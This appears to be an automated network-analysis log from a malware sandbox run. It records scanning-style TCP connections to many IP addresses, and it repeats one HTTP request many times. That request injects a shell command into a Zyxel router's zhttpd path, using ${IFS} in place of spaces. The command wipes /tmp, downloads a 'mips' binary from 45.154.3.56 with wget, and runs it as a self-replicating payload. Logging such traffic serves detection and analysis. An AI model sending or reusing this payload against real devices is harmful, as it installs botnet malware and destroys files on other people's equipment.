Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: unknownTCP traffic detected without corresponding DNS query: 32.133.33.15
Source: unknownTCP traffic detected without corresponding DNS query: 184.171.36.226
Source: unknownTCP traffic detected without corresponding DNS query: 61.92.203.229
Source: unknownTCP traffic detected without corresponding DNS query: 5.160.184.50
Source: unknownTCP traffic detected without corresponding DNS query: 114.161.187.225
Source: unknownTCP traffic detected without corresponding DNS query: 99.214.194.121
Source: unknownTCP traffic detected without corresponding DNS query: 32.133.33.15
Source: unknownTCP traffic detected without corresponding DNS query: 181.204.69.145
Source: unknownTCP traffic detected without corresponding DNS query: 8.133.82.34
Source: unknownTCP traffic detected without corresponding DNS query: 5.160.184.50
Source: unknownTCP traffic detected without corresponding DNS query: 61.92.203.229
Source: unknownTCP traffic detected without corresponding DNS query: 99.214.194.121
Source: unknownTCP traffic detected without corresponding DNS query: 205.199.118.221
Source: unknownTCP traffic detected without corresponding DNS query: 43.170.235.10
Source: unknownTCP traffic detected without corresponding DNS query: 83.206.81.2
Source: unknownTCP traffic detected without corresponding DNS query: 195.164.195.119
Source: unknownTCP traffic detected without corresponding DNS query: 147.101.74.158
Source: unknownTCP traffic detected without corresponding DNS query: 114.161.187.225
Source: unknownTCP traffic detected without corresponding DNS query: 205.199.118.221
Source: unknownTCP traffic detected without corresponding DNS query: 147.101.74.158
Source: unknownTCP traffic detected without corresponding DNS query: 184.171.36.226
Source: unknownTCP traffic detected without corresponding DNS query: 181.204.69.145
Source: unknownTCP traffic detected without corresponding DNS query: 207.174.235.189
Source: unknownTCP traffic detected without corresponding DNS query: 8.133.82.34
Source: unknownTCP traffic detected without corresponding DNS query: 185.241.172.4
Source: unknownTCP traffic detected without corresponding DNS query: 195.164.195.119
Source: unknownTCP traffic detected without corresponding DNS query: 83.206.81.2
Source: unknownTCP traffic detected without corresponding DNS query: 43.170.235.10
Source: unknownTCP traffic detected without corresponding DNS query: 223.79.152.168
Source: unknownTCP traffic detected without corresponding DNS query: 46.26.176.57
Source: unknownTCP traffic detected without corresponding DNS query: 207.174.235.189
Source: unknownTCP traffic detected without corresponding DNS query: 125.213.16.242
Source: unknownTCP traffic detected without corresponding DNS query: 184.228.57.222
Source: unknownTCP traffic detected without corresponding DNS query: 185.241.172.4
Source: unknownTCP traffic detected without corresponding DNS query: 149.20.137.42
Source: unknownTCP traffic detected without corresponding DNS query: 125.213.16.242
Source: unknownTCP traffic detected without corresponding DNS query: 46.26.176.57
Source: unknownTCP traffic detected without corresponding DNS query: 184.228.57.222
Source: unknownTCP traffic detected without corresponding DNS query: 223.79.152.168
Source: unknownTCP traffic detected without corresponding DNS query: 222.98.80.209
Source: unknownTCP traffic detected without corresponding DNS query: 198.135.20.96
Source: unknownTCP traffic detected without corresponding DNS query: 149.20.137.42
Source: unknownTCP traffic detected without corresponding DNS query: 117.171.125.27
Source: unknownTCP traffic detected without corresponding DNS query: 222.98.80.209
Source: unknownTCP traffic detected without corresponding DNS query: 102.142.28.125
Source: unknownTCP traffic detected without corresponding DNS query: 129.202.189.99
Source: unknownTCP traffic detected without corresponding DNS query: 159.91.9.186
Source: unknownTCP traffic detected without corresponding DNS query: 198.135.20.96
Source: unknownTCP traffic detected without corresponding DNS query: 2.122.14.205
Source: unknownTCP traffic detected without corresponding DNS query: 102.142.28.125
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
